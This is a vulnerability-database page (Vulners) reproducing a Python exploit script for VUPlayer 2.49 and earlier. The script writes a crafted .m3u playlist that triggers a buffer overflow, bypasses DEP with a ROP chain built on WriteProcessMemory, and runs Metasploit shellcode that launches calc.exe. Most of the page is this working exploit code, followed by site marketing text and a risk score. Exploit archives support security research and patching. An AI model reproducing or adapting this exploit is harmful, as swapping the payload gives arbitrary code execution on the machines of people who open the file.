Vulners
Lucene search
VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)
#!/usr/bin/env python
#
# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Author: mr_me
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 /noexecute=alwayson
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# DEP AlwaysOn bypass version
# Thanks to Sud0 & Lincoln, for the motivation to learn this :-)
#
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
crash = "HTTP://" + "\x41" * 1005
rop = "\xd3\x72\x60\x10" # POPAD # JE SHORT BASSMIDI.10607337 : 0x106072D3
rop += "\x2f\x10\x60\x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN : 0x1060102F
rop += "\x13\x22\x80\x7c" # @ of WriteProcessMemory() : 0x7C802213
rop += "\xcf\x22\x80\x7c" # Address to patched in kernel32 : 0x7C8022CF
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\xff\xff\xff\xff" # start @ -1 for shellcode size : 0xffffffff
rop += "\x15\x10\x10\x10" # This @ from .data segment of app dll : 0x10101015
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x79\x21\x60\x10" # POP EDI # POP ESI # RETN : 0x10602179
rop += "\x88\x71\x60\x10" # CALL EAX : 0x10607188
rop += "\xff\xff\xff\xff" # -hProcess argv[1] : 0xffffffff
# Get the length of shellcode - @ from kernel32
rop += "\x6f\x10\x81\x7c" * 305 # INC EBX # RETN : 0x7C81106F
# push all args on the stack for WPM() - @ from shell32.dll
rop += "\xf9\x18\xa1\x7c" # PUSHAD # RETN : 0x7CA118F9
buffer = crash + rop + sc
print "[+] Building .m3u file"
file = open('cst-vuplayer.m3u','w');
file.write(buffer);
file.close();
print "[+] Done"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1